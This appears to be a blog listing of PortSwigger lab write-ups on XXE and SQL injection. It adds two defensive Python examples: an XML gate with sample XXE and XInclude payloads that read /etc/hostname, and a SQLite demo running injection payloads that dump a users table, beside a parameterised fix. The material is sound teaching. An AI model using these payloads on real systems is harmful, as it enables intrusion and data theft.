Joel O. (joelodey.hashnode.dev), Apr 29, 2024
Lab: Exploiting XXE using external entities to retrieve files
Lab Scenario: Our mission is to exploit XXE through a web application's "Check stock" feature, specifically using external entities to retrieve files. By intercepting and manipulating a POST request, we intend to use XXE to trigger the retrieval of s...
Series: PortSwigger XML external entity (XXE) injection. Tag: xxe
Joel O. (joelodey.hashnode.dev), Apr 16, 2024
Lab: Exploiting XInclude to retrieve files
Lab Scenario: Our mission is to exploit XInclude through a web application's "Check stock" feature. By intercepting and manipulating a POST request, we intend to use XInclude to retrieve files from the server. Let's proceed with the solution: Interc...
Series: PortSwigger XML external entity (XXE) injection. Tag: xxe
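Added example, not taken from either post above or from PortSwigger's lab material: a pre-parse gate in Python that flags the two file-retrieval vectors these two labs cover, an external entity declared in an inline DTD and an XInclude element, before the request body reaches a parser. The stockCheck body shape, the element names, the entity name and the file path are constructed placeholders, not the labs' actual payloads.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies shaped like the "Check stock" POST the posts describe.
# Element names, the entity name and the target path are placeholders.
SAFE_BODY = ('<?xml version="1.0"?>'
             '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
XXE_BODY = ('<?xml version="1.0"?>'
            '<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
            '<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')
XINCLUDE_BODY = ('<?xml version="1.0"?><stockCheck>'
                 '<productId><xi:include xmlns:xi="http://www.w3.org/2001/XInclude" '
                 'parse="text" href="file:///etc/hostname"/></productId>'
                 '<storeId>1</storeId></stockCheck>')

# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri">, <!ENTITY name PUBLIC "id" "uri">
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(\w+)\s+(SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"([^"]*)"', re.I)
XINCLUDE_NS = "http://www.w3.org/2001/XInclude"
XINCLUDE_RE = re.compile(r'<(?:\w+:)?include\b[^>]*\bhref\s*=\s*"([^"]*)"', re.I)


def find_xml_risks(body: str) -> dict:
    """Report DOCTYPE, external entity declarations and XInclude hrefs found in a raw body."""
    risks = {"doctype": "<!DOCTYPE" in body.upper(),
             "external_entities": [], "xincludes": []}
    for name, kind, uri in ENTITY_RE.findall(body):
        risks["external_entities"].append({"name": name, "kind": kind.upper(), "uri": uri})
    if XINCLUDE_NS in body:
        # Only count <include href=...> when the XInclude namespace is actually declared.
        risks["xincludes"] = XINCLUDE_RE.findall(body)
    risks["blocked"] = (risks["doctype"]
                        or bool(risks["external_entities"])
                        or bool(risks["xincludes"]))
    return risks


def parse_stock_check(body: str) -> dict:
    """Hypothetical server-side handler: refuse risky input, then parse the two fields."""
    risks = find_xml_risks(body)
    if risks["blocked"]:
        raise ValueError(f"rejected XML: {risks}")
    root = ET.fromstring(body)
    return {"productId": root.findtext("productId"),
            "storeId": root.findtext("storeId")}


def is_rejected(body: str) -> bool:
    """True when the handler refuses the body before parsing it."""
    try:
        parse_stock_check(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, body in (("safe", SAFE_BODY), ("xxe", XXE_BODY), ("xinclude", XINCLUDE_BODY)):
        print(label, find_xml_risks(body))
```

The string-level gate is a detection and defence-in-depth layer, useful for logging probes against a stock-check endpoint; the actual fix is parser configuration that disables DTD processing, external entity resolution and XInclude, which differs per XML library and should be set regardless of this check.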
Prasun Ray (prasunray477.hashnode.dev), Apr 10, 2024
The Bug Bounty Chronicles
Introduction to web servers, web applications, and their configurations. What is a "Web Server"? A web server is the core software/hardware that stores websites and facilitates the client-server communication required to view web pages over the interne...
Tag: bugbounty
Joel O. (joelodey.hashnode.dev), Apr 8, 2024
Lab: SQL injection attack, listing the database contents on non-Oracle databases
In this educational guide, we will explore the practical application of Burp Suite to identify and exploit SQL injection vulnerabilities, highlighting the importance of robust security practices. Step 1: Intercepting and Modifying Requests with Burp ...
Series: PortSwigger SQL injection (SQLi) Labs. Tag: sqlinjection
Joel O. (joelodey.hashnode.dev), Apr 1, 2024
Lab: SQL injection UNION attack, retrieving data from other tables
In this educational guide, we will walk through the process of using Burp Suite to intercept and modify requests, focusing on the product category filter. Our objective is to unveil potential SQL injection vulnerabilities, understand the database str...
Series: PortSwigger SQL injection (SQLi) Labs. Tag: SQLi
Joel O. (joelodey.hashnode.dev), Mar 25, 2024
Lab: SQL injection attack, querying the database type and version on Oracle
To exploit SQL injection, it's crucial to understand the structure of the database query. Use a payload to determine the number of columns returned by the query and identify columns containing text data. For instance, inject the following payload int...
Series: PortSwigger SQL injection (SQLi) Labs. Tag: sqlinjection
Joel O. (joelodey.hashnode.dev), Mar 18, 2024
Lab: SQL injection UNION attack, determining the number of columns returned by the query
SQL injection is a serious security risk for web applications, and Burp Suite can be used to identify and address these vulnerabilities. This guide shows how to use Burp Suite to intercept and modify requests, specifically focusing on the product cat...
Series: PortSwigger SQL injection (SQLi) Labs. Tag: portswigger
Kaustubh Rai for BreachForce (breachforce.net), Mar 9, 2024
Streamlining Security Assessments with BChecks
All of us - security professionals - use Burp Suite every day, whether as red teamers or blue teamers. With our experience in the industry, we've encountered scenarios where we'd like to remember specific test cases for particular categories. We ofte...
Tag: bchecks
Joel O. (joelodey.hashnode.dev), Mar 5, 2024
Lab: SQL injection UNION attack, finding a column containing text
In this lab, our goal is to identify which of the columns returned by the query can carry text data, offering valuable insight into potential SQL injection vulnerabilities. Step 1: Intercepting and Modifying Requests with Burp Suite Burp Suite, a versatile web appli...
Series: PortSwigger SQL injection (SQLi) Labs. Tag: Burpsuite
Joel O. (joelodey.hashnode.dev), Feb 26, 2024
Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Lab Scenario: Our objective is to understand and exploit a SQL injection vulnerability in the WHERE clause of a web application's stock check feature. By carefully probing and bypassing security measures, we aim to retrieve hidden data and ultimately...
Series: PortSwigger SQL injection (SQLi) Labs. Tag: sqlinjection
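Added example, not from any of the SQL injection posts listed above and not the labs' own database: the sequence those posts walk through, from the WHERE-clause bypass that exposes unreleased products, through the ORDER BY probe for the column count, to a UNION that pulls rows from another table, the engine version and the table list, replayed against an in-memory SQLite database with constructed data, beside the parameterised fix. Table and column names are assumptions. SQLite's `sqlite_master` and `sqlite_version()` stand in for the Oracle `v$version` catalog and the `information_schema` views the labs query; the type-error trick for spotting a text column does not reproduce in SQLite because it is dynamically typed, so that step is left out.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the shop database. Rows are constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1), ('Lamp', 'Gifts', 0),
                                    ('Pen', 'Office', 1);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cret'), ('wiener', 'peter');
    """)
    return db


def vulnerable_filter(db: sqlite3.Connection, category: str) -> list:
    """The lab-style bug: the category parameter is concatenated into the WHERE clause.
    'released = 1' is the server-side restriction the injection is meant to comment out."""
    sql = (f"SELECT name, category FROM products "
           f"WHERE category = '{category}' AND released = 1")
    return db.execute(sql).fetchall()


def safe_filter(db: sqlite3.Connection, category: str) -> list:
    """The fix: a bound parameter, so the input is only ever compared as a value."""
    sql = "SELECT name, category FROM products WHERE category = ? AND released = 1"
    return db.execute(sql, (category,)).fetchall()


def probe_column_count(db: sqlite3.Connection, max_cols: int = 10) -> int:
    """Raise ORDER BY n until the database errors; the last n that worked is the count."""
    count = 0
    for n in range(1, max_cols + 1):
        try:
            vulnerable_filter(db, f"Gifts' ORDER BY {n}--")
            count = n
        except sqlite3.OperationalError:
            break
    return count


def union_dump(db: sqlite3.Connection, select_list: str) -> list:
    """Append a UNION SELECT with as many columns as the original query returns (two here).
    A category that matches nothing leaves only the injected rows in the result."""
    return vulnerable_filter(db, f"x' UNION SELECT {select_list}--")


def version_via_union(db: sqlite3.Connection) -> tuple:
    """SQLite's analogue of the version-banner step: (value leaked via UNION, real value)."""
    leaked = union_dump(db, "sqlite_version(), NULL")[0][0]
    return leaked, sqlite3.sqlite_version


if __name__ == "__main__":
    db = build_db()
    print("hidden data:", vulnerable_filter(db, "Gifts' OR 1=1--"))
    print("column count:", probe_column_count(db))
    print("users:", union_dump(db, "username, password FROM users"))
    print("version:", version_via_union(db))
    print("tables:", union_dump(db, "name, sql FROM sqlite_master WHERE type = 'table'"))
    print("parameterised:", safe_filter(db, "Gifts' OR 1=1--"))
```

The `--` comment that ends each payload is what swallows the trailing `' AND released = 1`; without it the injected quote would leave the statement unbalanced. Against the parameterised query the same strings are just category names that match nothing, which is the check to run after the fix lands.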